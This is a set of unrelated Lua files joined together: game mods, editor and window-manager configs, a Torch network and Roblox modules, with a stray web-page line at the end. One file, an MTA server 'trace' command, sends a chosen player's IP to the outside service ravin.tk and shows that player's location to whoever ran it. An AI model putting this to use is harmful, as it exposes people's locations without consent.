-- sets train to automatic mode again, when train is restored completely
local old_train = stored_info.train
if settings.global["ick-automatic-mode"].value and old_train then
local new_train = {["locomotive"] = 0, ["cargo-wagon"] = 0, ["fluid-wagon"] = 0, ["artillery-wagon"] = 0}
for _, entity in pairs(entity.train.carriages) do
new_train[entity.type] = new_train[entity.type] + 1
end
if old_train["locomotive"] == new_train["locomotive"] and old_train["cargo-wagon"] == new_train["cargo-wagon"] and old_train["fluid-wagon"] == new_train["fluid-wagon"] and old_train["artillery-wagon"] == new_train["artillery-wagon"] then
entity.train.manual_mode = false
end
end
end
end
end
end
-- called when a player builds the ghost entity
script.on_event(defines.events.on_built_entity, function(event)
built_entity(event.created_entity)
end, {{filter = "rolling-stock"}})
-- called when a robot builds the ghost entity
script.on_event(defines.events.on_robot_built_entity, function(event)
built_entity(event.created_entity)
end, {{filter = "rolling-stock"}})
-- ON ENTITY DESTROYED
-- called when a registerd entity gets removed (rolling stock ghosts or item request proxies)
script.on_event(defines.events.on_entity_destroyed, function(event)
if global.ick_destroyed_train and global.ick_destroyed_train[event.registration_number] then
-- moves equipment from cargo inventory into grid
local registerd_entity = global.ick_destroyed_train[event.registration_number]
if registerd_entity.requests and registerd_entity.target then
local inventory = registerd_entity.target.get_inventory(defines.inventory.cargo_wagon)
local grid = registerd_entity.target.grid
for name, count in pairs(registerd_entity.requests) do
if inventory and grid then
for i = 1, count do
local stack = inventory.find_item_stack(name)
if stack and grid.put{name = name} then
stack.count = stack.count - 1
end
end
end
end
end
-- deletes saved inventory properties
global.ick_destroyed_train[event.registration_number] = nil
end
end)
|
local g_TracedPlayers = {}
local TRACE_URL = 'https://ravin.tk/api/mta/trace.php?ip=%s'
local function onTraceResult(data, errno, player_name, player_id)
if(not g_TracedPlayers[player_id]) then return end
local msg = ''
local trace, country = fromJSON(data)
if(data ~= 'ERROR' and type(trace) == 'string' and type(country) == 'string') then
country = country:upper()
if(g_Countries[country]) then
country = g_Countries[country]
end
msg = {"%s's trace: %s.", tostring(player_name), trace..', '..country}
else
msg = {"Trace error: %s!", tostring(data)..' '..tostring(errno)}
end
local oldScriptMsgState = g_ScriptMsgState
for i, state in ipairs(g_TracedPlayers[player_id]) do
g_ScriptMsgState = state
scriptMsg(unpack(msg))
end
g_ScriptMsgState = oldScriptMsgState
g_TracedPlayers[player_id] = nil
end
CmdMgr.register{
name = 'trace',
desc = "Checks where the player lives",
args = {
{'player', type = 'player', defValFromCtx = 'player'},
},
func = function(ctx, player)
if(not player.id) then
privMsg(ctx.player, "Guests cannot use this command")
return
end
if(not g_TracedPlayers[player.id]) then
g_TracedPlayers[player.id] = {}
end
table.insert(g_TracedPlayers[player.id], table.copy(g_ScriptMsgState, true))
local url = TRACE_URL:format(urlEncode(player:getIP()))
if(not fetchRemote(url, onTraceResult, '', false, player:getName(true), player.id)) then
privMsg(ctx.player, "Failed to get player trace")
end
end
}
local function TrcOnPlayerQuit()
local pdata = Player.fromEl(source)
if pdata and pdata.id then
g_TracedPlayers[pdata.id] = nil
end
end
addInitFunc(function()
addEventHandler('onPlayerQuit', g_Root, TrcOnPlayerQuit)
end)
|
require 'cutorch'
require 'cunn'
require 'cudnn'
require 'stackdata'
cutorch.setDevice(2)
model = nn.Sequential()
local MaxPooling = cudnn.SpatialMaxPooling
if not paths.filep('model.t7') then
local function addLayers(nin, nout)
model:add(cudnn.SpatialConvolution(nin, nout,3,3,1,1,1,1))
model:add(cudnn.SpatialBatchNormalization(nout, 1e-3))
model:add(cudnn.ReLU(true))
return model
end
addLayers(1,16):add(nn.SpatialDropout(0.3))
addLayers(16,16)
local pool1 = MaxPooling(2,2,2,2):ceil()
model:add(pool1)
addLayers(16,32):add(nn.SpatialDropout(0.4))
addLayers(32,32)
local pool2 = MaxPooling(2,2,2,2):ceil()
model:add(pool2)
addLayers(32,32):add(nn.SpatialDropout(0.4))
addLayers(32,32):add(nn.SpatialDropout(0.4))
model:add(nn.SpatialUpSamplingNearest(2))
addLayers(32,32):add(nn.SpatialDropout())
addLayers(32,16)
model:add(nn.SpatialUpSamplingNearest(2))
addLayers(16,16):add(nn.SpatialDropout())
addLayers(16,2)
local function MSRinit(net)
local function init(name)
for k,v in pairs(net:findModules(name)) do
--print('hi')
local n = v.kW*v.kH*v.nOutputPlane
v.weight:normal(0,math.sqrt(2/n))
v.bias:zero()
end
end
-- have to do for both conv types
init'cudnn.SpatialConvolution'
end
MSRinit(model)
model = model:cuda()
else
model = torch.load('model.t7')
end
function savemodel()
model:clearState()
torch.save('model.t7', model)
end
|
local autocmd = {}
-- commands is a table with the following keys:
-- events - A table listing which events to trigger the autocmd, see :h events
-- modifiers - A table to pass modifiers like ++once and ++nested, see :h autocmd for ++once and :h autocmd-nested for ++nested
-- targets - Where to apply the autocommands. Things like <buffer> and the file pattern should go here
-- command - The command you wish to run
function autocmd.autocmd(commands)
local autocmd_str = "autocmd"
if commands.bang == true then
autocmd_str = autocmd_str .. "!"
end
vim.cmd(
string.format(
"%s %s %s %s %s",
autocmd_str,
table.concat(commands.events or {}, ","),
table.concat(commands.targets or {}, ","),
table.concat(commands.modifiers or {}, " "),
commands.command
)
)
end
function autocmd.augroup(name, commands, opts)
opts = opts or {}
vim.cmd("augroup " .. name)
-- if this is a buffer augroup, make sure we remove only things from the
-- buffer
if opts.buffer == true then
vim.cmd("autocmd! * <buffer>")
else
-- otherwise remove all autocmds from the group
vim.cmd("autocmd!")
end
for _, command in ipairs(commands) do
autocmd.autocmd(command)
end
vim.cmd("augroup END")
end
return autocmd
|
local awful = require("awful")
local ruled = require("ruled")
local naughty = require("naughty")
-- Notifications for Awesome
ruled.notification.connect_signal('request::rules', function()
-- All notifications will match this rule.
ruled.notification.append_rule {
rule = { },
properties = {
screen = awful.screen.preferred,
implicit_timeout = 5,
}
}
end)
naughty.connect_signal("request::display", function(n)
naughty.layout.box { notification = n }
end)
|
-- Deal50: A game inspired by the TV show
-- Developed by Joaquin
-- Final project for GD50 2020
ShuffleState = Class{__includes = BaseState}
function ShuffleState:init()
-- Play shuffle music and set it to loop
gameAudio['lounge']:setLooping(true)
gameAudio['lounge']:play()
-- Variables to determine if swapping is complete
self.haltPresses = true
-- Variables to store prompt text and its alpha
self.promptText = "Good Luck!"
self.promptAlpha = 0
-- Several check variables for pulling off shuffle anim
self.shuffleOn = false
self.shufflePromptSet = false
self.shuffleAnimCount = 0
self.shuffleAnimFlip = 0
self.shuffleMax = 100
-- Fade in prompt text as we enter the state.
Timer.tween(1, {
[self] = {promptAlpha = 255}
})
-- Reveal cases after 1 second since enter
Timer.after(1, function()
for i = 1, #CASE_VALUES do
self.cases[i]:appearCase()
end
end)
-- After 3 seconds since enter, SHUFFLE!
Timer.after(3, function()
self.promptText = "Shuffling..."
self.shuffleOn = true
end)
end
function ShuffleState:enter(params)
-- Grab the cases that were passed from
-- the prior state and store them for use here.
self.cases = params.cases or {}
end
function ShuffleState:update(dt)
-- Press escape at any time to quit, regardless
-- if haltPresses is on during transitions.
if love.keyboard.wasPressed('escape') then
love.event.quit()
end
-- With this, I could avoid a Timer.after eyesore!
-- Believe me, you do not wanna see how the code after where
-- the "Shuffling..." text is set looked like... Yikes!
-- If shuffle's on and we have not reached our shuffleMax yet
if self.shuffleOn and (self.shuffleAnimCount < self.shuffleMax) then
-- Turn off shuffle one-shot and set tween flipper back to 0
self.shuffleOn = false
self.shuffleAnimFlip = 0
-- Do a shuffle!
self:doShuffle()
-- Tween animation counter, then turn shuffle back on afterward
Timer.tween(0.15, {
[self] = {shuffleAnimFlip = 1}
}):finish(function()
self.shuffleOn = true
end)
-- Increment animation count back to 1
self.shuffleAnimCount = self.shuffleAnimCount + 1
-- If we have reached the maximum and if we have not set the prompt yet
elseif (self.shuffleAnimCount == self.shuffleMax) and not self.shufflePromptSet then
-- Set prompt set to true
self.shufflePromptSet = true
-- After 1 second, set prompt, display case keys,
-- and give control back to player.
Timer.after(1, function()
self.promptText = "Pick a Container"
for i = 1, #CASE_VALUES do
self.cases[i].displayKey = true
end
self.haltPresses = false
end)
end
-- Accept input once halt flag is released
if not self.haltPresses then
-- Go through every case
for i = 1, #CASE_VALUES do
-- If we chose a case and double-checking halt presses is not on
if love.keyboard.wasPressed(self.cases[i].keyButton)
and not self.haltPresses then
-- Halt any presses as we picked a case
-- and we move on to the play state
self.haltPresses = true
-- Say what case the player chose
self.promptText = "Your Container Is " .. string.upper(self.cases[i].keyButton)
-- Play a sound effect confirming our choice
gameAudio['good']:stop()
gameAudio['good']:play()
-- Tween case to the bottom right corner
Timer.tween(1, {
[self.cases[i]] = {
x = VIRTUAL_WIDTH - (TILE_SIZE*3),
y = VIRTUAL_HEIGHT - (TILE_SIZE*3)
}
})
-- Set that this case is ours
self.cases[i].chosenCase = true
-- Fade out text after 3 seconds then move to next state
Timer.after(3, function()
Timer.tween(1, {
[self] = {promptAlpha = 0}
}):finish(function()
-- Move to the play state, sending the cases
gameAudio['lounge']:stop()
gameStateMachine:change('play', {
cases = self.cases
})
end)
end)
end
end
end
-- Update timer
Timer.update(dt)
end
function ShuffleState:render()
-- Draw cases
for i = 1, #CASE_VALUES do
self.cases[i]:render()
end
-- Print the prompts
self:printPrompt(self.promptText, self.promptAlpha)
end
-- Shuffle a case!
function ShuffleState:doShuffle()
-- Pick two random case numbers
local case1 = math.random(1, #CASE_VALUES)
local case2 = math.random(1, #CASE_VALUES)
-- If both case numbers are the same, pick a number for the
-- the second case number is not the number for the first
if case1 == case2 then
if case1 < (#CASE_VALUES / 2) then
case2 = math.random(case1 + 1, #CASE_VALUES)
else
case2 = math.random(1, case1 - 1)
end
end
-- Temporarily store the values of the cases for swapping
local x1, x2 = self.cases[case1].x, self.cases[case2].x
local y1, y2 = self.cases[case1].y, self.cases[case2].y
local keyButton1, keyButton2 = self.cases[case1].keyButton, self.cases[case2].keyButton
-- Swap keys
self.cases[case1].keyButton, self.cases[case2].keyButton = keyButton2, keyButton1
-- Tween the swap
Timer.tween(0.15, {
[self.cases[case1]] = {x = x2, y = y2},
[self.cases[case2]] = {x = x1, y = y1}
})
end
function ShuffleState:printPrompt(text, alpha)
-- Set prompt font
love.graphics.setFont(gameFonts['medium'])
-- Set shadow color
love.graphics.setColor(0, 0, 0, alpha / 2)
-- Print enter prompt shadow
love.graphics.printf(text, 1, VIRTUAL_HEIGHT / 12 + 1, VIRTUAL_WIDTH, 'center')
-- Set the color for the prompt
love.graphics.setColor(255, 255, 255, alpha)
-- Print the prompt
-- The prompt is shifted by one pixel to the
-- left to avoid nearest neighbor artifacting.
love.graphics.printf(text, -1, VIRTUAL_HEIGHT / 12 - 1, VIRTUAL_WIDTH, 'center')
end
|
return {
AllowedInstanceTypes = {"Humanoid", "NumberValue"};
Reducer = function (_, values)
local walkSpeed = math.huge
for _, maxSpeed in ipairs(values) do
if maxSpeed < walkSpeed then
walkSpeed = maxSpeed
end
end
return walkSpeed
end;
Apply = function (self, value)
if self.Instance:IsA("NumberValue") then
self.Instance.Value = value
else
self.Instance.WalkSpeed = value
end
end;
Destructor = function (self)
if self.Instance:IsA("NumberValue") then
self.Instance.Value = 16
else
self.Instance.WalkSpeed = 16
end
end;
}
|
--- The AnimationPlayer makes playing and loading tracks into a humanoid easy, providing an interface to
-- playback animations by name instead of resolving a reference to the actual animation.
-- @classmod AnimationPlayer
local require = require(game:GetService("ReplicatedStorage"):WaitForChild("Nevermore"))
local Signal = require("Signal")
local AnimationPlayer = {}
AnimationPlayer.__index = AnimationPlayer
AnimationPlayer.ClassName = "AnimationPlayer"
--- Constructs a new animation player for the given humanoid.
-- @constructor
-- @tparam Humanoid humanoid The humanoid to construct the animation player with. The humanoid will have animations
-- loaded in on them.
function AnimationPlayer.new(humanoid)
local self = setmetatable({}, AnimationPlayer)
self._humanoid = humanoid or error("No humanoid")
self._tracks = {}
self._fadeTime = 0.4 -- Default
self.TrackPlayed = Signal.new()
return self
end
--- Adds an animation to use, storing the animation by the name property. The animation will be loaded
-- into the humanoids.
-- @param animation The animation to add.
function AnimationPlayer:WithAnimation(animation)
self._tracks[animation.Name] = self._humanoid:LoadAnimation(animation)
return self
end
--- Adds an animation to play
function AnimationPlayer:AddAnimation(name, animationId)
local animation = Instance.new("Animation")
if tonumber(animationId) then
animation.AnimationId = "http://www.roblox.com/Asset?ID=" .. tonumber(animationId) or error("No animationId")
else
animation.AnimationId = animationId
end
animation.Name = name or error("No name")
return self:WithAnimation(animation)
end
--- Returns a track in the player
function AnimationPlayer:GetTrack(trackName)
return self._tracks[trackName] or error("Track does not exist")
end
--- Plays a track
-- @tparam string trackName Name of the track to play
-- @tparam[opt=0.4] number fadeTime How much time it will take to transition into the animation.
-- @tparam[opt=1] number weight Acts as a multiplier for the offsets and rotations of the playing animation
-- This parameter is extremely unstable.
-- Any parameter higher than 1.5 will result in very shaky motion, and any parameter higher '
-- than 2 will almost always result in NAN errors. Use with caution.
-- @tparam[opt=1] number speed The time scale of the animation.
-- Setting this to 2 will make the animation 2x faster, and setting it to 0.5 will make it
-- run 2x slower.
-- @tparam[opt=0.4] number stopFadeTime
function AnimationPlayer:PlayTrack(trackName, fadeTime, weight, speed, stopFadeTime)
fadeTime = fadeTime or self._fadeTime
local track = self:GetTrack(trackName)
if not track.IsPlaying then
self.TrackPlayed:Fire(trackName, fadeTime, weight, speed, stopFadeTime)
self:StopAllTracks(stopFadeTime or fadeTime)
track:Play(fadeTime, weight, speed)
end
return track
end
--- Stops a track from being played
-- @tparam string trackName
-- @tparam[opt=0.4] number fadeTime
-- @treturn AnimationTrack
function AnimationPlayer:StopTrack(trackName, fadeTime)
fadeTime = fadeTime or self._fadeTime
local track = self:GetTrack(trackName)
if track.IsPlaying then
track:Stop(fadeTime)
end
return track
end
--- Stops all tracks playing
function AnimationPlayer:StopAllTracks(fadeTime)
for trackName, _ in pairs(self._tracks) do
self:StopTrack(trackName, fadeTime)
end
end
--- Deconstructs the animation player, stopping all tracks
function AnimationPlayer:Destroy()
self:StopAllTracks()
setmetatable(self, nil)
end
return AnimationPlayer
|
-- Inaccurate, but sure to hit
function AssaultRifle()
Bot.RailgunReload = 5
Bot.RailgunDamage = 10
Bot.RailgunSpread = math.pi/4
Bot.RailgunRate = 1/10
Bot.RailgunDefaultAmmo = 30
RailgunAmmo.Value = 90
end
AssaultRifle()
|
links = {}
links.getLink = function(f)
-- restrict scope
local file = fs.open(f, 'r')
-- Check if it's a link file or not.
if file.readLine()=='link' then
local contents = file.readLine()
file:close()
-- use conventional contents return
return contents
else
-- conventional return false on error
return false
end
end
return links
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.